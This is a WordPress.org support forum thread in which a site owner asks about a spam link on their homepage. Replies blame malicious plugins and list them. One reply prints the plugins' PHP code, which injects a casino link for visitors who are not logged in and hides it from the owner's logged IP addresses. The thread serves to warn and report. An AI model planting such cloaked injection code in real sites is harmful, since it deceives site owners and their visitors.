WordPress.org

Ready to get started?Download WordPress

Forums

My Site deface link integrated on my homepage (7 posts)

  1. wandisyahid
    Member
    Posted 8 months ago #

    On my website there is a link |<p align="right">http://bet.sitonline.it</p>| I do not know the location of the link please help: (

  2. WPyogi
    Volunteer Moderator
    Posted 8 months ago #

  3. Krishna
    Volunteer Moderator
    Posted 8 months ago #

    You can find that link on several other sites if you make a Google search for it. It looks like an intrusion/ hack into your site, though security check tools do not show that. Review: http://codex.wordpress.org/Hardening_WordPress

    Edit: Follow WPyogi's advice above.

  4. wandisyahid
    Member
    Posted 8 months ago #

    Hello,

    Ok thanks all,

    Problem resolve i'm replace all file wp-admin,wp-includes except wp-config.php and wp-content and back to normal.

    Thanks you so much.

  5. maggot399
    Member
    Posted 7 months ago #

    Actually no one hacked into your site the way you might think - the spam links are created by a malicious WordPress plugins you downloaded directly from wordpress.org. The spammer just keeps creating new plugins after they get banned. Defintely a flaw in the way WordPress offer plugins to users...

    The following plugins are known to be linked to the spammer;

    seo-cheese
    return-to-top
    g-translate (note the hyphen - other versions are fine)
    seo-interlinking
    google-maps-by-daniel-martyn

    If you have installed any of these plugins they should be removed immediately as they are all produced by the same hacker. They all insert dodgy links into the top of your site.

    Malicious code (this is normally found in setup.php or install.php)

    <?php
    if (is_user_logged_in()) { $loggedin = 'yes'; } else { $loggedin = 'no'; }
    if ($loggedin == 'no') {
    $ip = $_SERVER['REMOTE_ADDR'];
    $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/seo-cheese/created.txt';
    $handle = fopen($filename, "r");
    $contents = fread($handle, filesize($filename));
    fclose($handle);
    $filestring= $contents;
    $findme  = $ip;
    $pos = strpos($filestring, $findme);
    if ($pos === false) {
    ?>
    <p align="center"><a href="http://online-casino.blog.ca">http://online-casino.blog.ca</a></p>
    <?php //
    } else {
    echo '';
    }}
    ?>

    The following sites are linked to the same hacker and listing them here will hopefully help other people who have the same issue.

    [ Thanks but please do not post spammy links like that on these forums ]

    The trick works well because the link itself is not visible to the site owner as firstly, it doesn't show if you are logged in to your own site, and secondly it also keeps a log of all past IP addresses that successfully logged in before and hides the link to any recorded IP addresses.

  6. The spammer just keeps creating new plugins after they get banned. Defintely a flaw in the way WordPress offer plugins to users...

    it's the best 100% staffed by volunteer system available. Sometimes that happens and when it's properly reported it gets dealt with quickly.

    For example this one was discovered and dealt with.

    google-maps-by-daniel-martyn

    I haven't validated your other listed plugins but if you have specific information about those plugins please send the details to plugins [at] worddpress.org and those plugins will get looked at.

  7. maggot399
    Member
    Posted 7 months ago #

    Actually all the others on the list have already been dealt with so I see WordPress do have a lot of moderators here that seem to do a great job in protecting other WordPress users.

    The issue is however, there's no doubt other plugins live right now, created by the same spammer, that we don't know about. When they create a new plugin it 'survives' for a few weeks without being detected, which is enough for a good few hundred sites to get infected. Once you install one of the dodgy plugins created by this spammer it hard to even notice you have a problem, because of the way it deceptively hides the link to the site owner.

    Also many thousands of sites remain infected right now by the plugins I listed above, even though they were removed quite quickly.

    Is there anyway for WordPress to email users that have installed a plugin after it gets removed for reasons like this? I take it once WordPress is installed on their own domain there's no connection between WordPress servers and the site owner?

    See these links for more information
    http://wordpress.org/support/topic/strange-link-to-casino-online-appeared-at-the-top-of-my-blog
    http://wordpress.org/support/topic/random-casino-link-has-appeared-on-my-wordpress-site

    To see just how widespread he problem is just type in one of the spammy domains into Google and see just how many thousands are displaying the link on their blog. (couple of the links are in the links I provided above).

    Thanks

Reply

You must log in to post.

About this Topic